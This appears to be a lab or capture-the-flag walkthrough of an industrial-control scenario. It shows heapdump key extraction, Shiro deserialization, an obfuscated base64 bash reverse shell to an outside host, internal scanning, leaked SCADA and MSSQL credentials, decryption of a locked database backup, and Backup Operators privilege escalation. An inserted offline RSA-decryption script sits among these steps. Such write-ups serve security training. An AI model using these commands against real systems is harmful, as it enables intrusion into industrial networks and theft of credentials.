Key points:
- Memory leak (heapdump)
- Shiro deserialization RCE
- ICS (industrial control) basics
- RSA + AES decryption
- Backup Operators privilege escalation
Same as the hospital lab: look for the memory leak
http://121.89.193.140:8080/actuator/heapdump
Here the memory-leak detection tool JDumpSpider (https://github.com/whwlsfb/JDumpSpider), already mentioned in the hospital writeup, finds the key directly; after that, one pass with the tool is all it takes
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
...
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
...
Pop a shell with the tool
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMzYueHgueHgvOTM4MyAwPiYx}|{base64,-d}|{bash,-i}'
Scan the internal network
(remote) root@security:/# ./fscan -h 172.22.17.213/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo:
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[*] NetBios: 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] WebTitle: http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6
[*] WebTitle: http://172.22.17.213:8080/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6 code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp://172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle: http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
The scan turned up an anonymous FTP; connect to it
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
Scan the 172.22.26.0/24 segment as well
(remote) root@security:/# ./fscan -h 172.22.26.1/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:139 open
172.22.26.11:135 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios: 172.22.26.11 WORKGROUP\WIN-SCADA
[*] NetInfo:
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[+] mssql:172.22.26.11:1433:sa 123456
[*] WebTitle: http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5
[*] 扫描结束,耗时: 5.730632575s
RDP to 172.22.26.11, then click the boiler's start button and the flag appears
Press Windows+D to return to the desktop, where there is a ScadaDB.sql.locky. If we connect to the database directly, the flag there is empty, so we need the backup, but the backup is encrypted; here we decrypt it with the key given in the challenge description
The challenge description gives a privateKey and an encryptedAesKey: encryptedAesKey is the AES key RSA-encrypted under this key pair, and privateKey is the RSA key that recovers it
#privateKey
<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>
First convert the XML key to PEM format (https://www.ssleye.com/ssltool/pem_xml.html)
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
Then decrypt encryptedAesKey with an online RSA tool (https://www.lddgo.net/encrypt/rsa)
Finally, write a short AES script to decrypt the SQL file, using the first 16 bytes of the file as the IV
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# Read the encrypted file
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
    encrypted_data = file.read()

# Decryption key: the AES key recovered from encryptedAesKey (base64-encoded, 32 bytes)
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)

# The first 16 bytes of the file are the IV
iv = encrypted_data[:16]

# Create the AES-CBC decryptor
cipher = AES.new(key, AES.MODE_CBC, IV=iv)

# Decrypt everything after the IV and strip the PKCS#7 padding
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)

# Write the decrypted content to a new file
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
    file.write(decrypted_data)

print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')
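The two online steps above (XML-to-PEM conversion and the RSA decryption of encryptedAesKey) can be done offline, which keeps the private key off third-party websites. The script below is an added example, not part of the writeup, and uses only the Python standard library: it parses the privateKey printed above, checks that its components agree with one another, re-encodes it as a PKCS#1 PEM, and RSA-decrypts a PKCS#1 v1.5 ciphertext. Two assumptions: the challenge's encryptedAesKey uses PKCS#1 v1.5 padding (what .NET's RSACryptoServiceProvider.Encrypt(data, false) produces), and, since the ciphertext itself is not reproduced on the page, the demo instead round-trips the AES key the writeup recovered through the public half of the same key pair.

```python
"""Added example (not the writeup's code): offline replacement for the two online
tools. Parses a .NET <RSAKeyValue> private key, validates it, emits PKCS#1 PEM and
performs RSA PKCS#1 v1.5 decryption, standard library only."""
import base64
import math
import os
import re

# Private key exactly as given in the challenge description (copied from the writeup).
RSA_KEY_XML = (
    "<RSAKeyValue>"
    "<Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus>"
    "<Exponent>AQAB</Exponent>"
    "<P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P>"
    "<Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q>"
    "<DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP>"
    "<DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ>"
    "<InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ>"
    "<D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D>"
    "</RSAKeyValue>"
)

# The AES key the writeup recovered from encryptedAesKey (base64, 32 bytes = AES-256).
RECOVERED_AES_KEY = base64.b64decode("cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=")


def parse_rsakeyvalue(xml: str) -> dict:
    """Return the RSAKeyValue components as big integers (.NET stores big-endian base64)."""
    key = {}
    for tag in ("Modulus", "Exponent", "P", "Q", "DP", "DQ", "InverseQ", "D"):
        m = re.search(rf"<{tag}>([^<]+)</{tag}>", xml)
        if m is None:
            raise ValueError(f"missing <{tag}> element")
        key[tag] = int.from_bytes(base64.b64decode(m.group(1)), "big")
    return key


def key_is_consistent(key: dict) -> bool:
    """Sanity check before trusting a key pulled out of a text blob: n == p*q, e*d == 1 mod lambda(n)."""
    n, e, d, p, q = (key[t] for t in ("Modulus", "Exponent", "D", "P", "Q"))
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
    return p * q == n and (e * d) % lam == 1


def _der_length(length: int) -> bytes:
    if length < 0x80:
        return bytes([length])
    raw = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw


def _der_integer(value: int) -> bytes:
    raw = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if raw[0] & 0x80:  # DER INTEGER is signed: prepend 0x00 so the value stays positive
        raw = b"\x00" + raw
    return b"\x02" + _der_length(len(raw)) + raw


def to_pkcs1_pem(key: dict) -> str:
    """Encode as RFC 8017 RSAPrivateKey (version 0) and PEM-armour it."""
    order = (0, key["Modulus"], key["Exponent"], key["D"], key["P"], key["Q"],
             key["DP"], key["DQ"], key["InverseQ"])
    body = b"".join(_der_integer(v) for v in order)
    der = b"\x30" + _der_length(len(body)) + body
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END RSA PRIVATE KEY-----\n"


def rsa_decrypt_pkcs1v15(key: dict, ciphertext: bytes) -> bytes:
    """Private-key operation plus PKCS#1 v1.5 type-2 unpadding (the step the online tool performed)."""
    n, d = key["Modulus"], key["D"]
    k = (n.bit_length() + 7) // 8
    if len(ciphertext) != k:
        raise ValueError("ciphertext must be exactly one modulus length")
    em = pow(int.from_bytes(ciphertext, "big"), d, n).to_bytes(k, "big")
    # EM = 0x00 || 0x02 || PS (at least 8 non-zero bytes) || 0x00 || M
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x02" or sep < 10:
        raise ValueError("invalid PKCS#1 v1.5 padding")
    return em[sep + 1:]


def rsa_encrypt_pkcs1v15(key: dict, message: bytes) -> bytes:
    """Public-key side, used here only to build a ciphertext for the round-trip demo."""
    n, e = key["Modulus"], key["Exponent"]
    k = (n.bit_length() + 7) // 8
    ps_len = k - 3 - len(message)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    ps = b""
    while len(ps) < ps_len:  # the padding string must not contain zero bytes
        ps += bytes(b for b in os.urandom(ps_len - len(ps)) if b != 0)
    em = b"\x00\x02" + ps + b"\x00" + message
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


if __name__ == "__main__":
    key = parse_rsakeyvalue(RSA_KEY_XML)
    print("key consistent:", key_is_consistent(key))
    print(to_pkcs1_pem(key))
    ct = rsa_encrypt_pkcs1v15(key, RECOVERED_AES_KEY)
    print("round-trip ok:", rsa_decrypt_pkcs1v15(key, ct) == RECOVERED_AES_KEY)
```

The PEM this produces carries the PKCS#1 "RSA PRIVATE KEY" header rather than the PKCS#8 "PRIVATE KEY" header the online converter emitted; openssl and pycryptodome accept either. Feed the real encryptedAesKey bytes to rsa_decrypt_pkcs1v15 to obtain the AES key, then the AES-CBC script above finishes the job.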
There is another flag on the SCADA engineer's personal PC, which needs privilege escalation. Back on that same FTP you can find plenty of user records plus the password policy: the initial password is account name + @ + employee ID. For engineer chenhua, for example, that gives chenhua@0813, which logs straight in over RDP to 172.22.17.6. Because the user is in the Backup Operators group, the group's privileges can be used to escalate (https://github.com/k4sth4/SeBackupPrivilege)
PS C:\Windows\system32> cd C:\Users\chenhua\Desktop\
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege
PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
Copied 350 bytes
PS C:\Users\chenhua\Desktop> type .\flag02.txt
_____.__ _______ ________
_/ ____\ | _____ ____ \ _ \ \_____ \
\ __\| | \__ \ / ___\/ /_\ \ / ____/
| | | |__/ __ \_/ /_/ > \_/ \/ \
|__| |____(____ /\___ / \_____ /\_______ \
\//_____/ \/ \/
flag02: flag{cd4c83d9-0fc9-47f3-a947-c34c5e5266fb}
PS C:\Users\chenhua\Desktop>
This lab is the original challenge from last year's Industrial Information Security Skills Competition final (thermal power plant scenario). At the time I was helping a friend look at it and we didn't get through it; this time I finally had the chance. Back then only five teams cleared it, almost all of them telecom operators, which was remarkable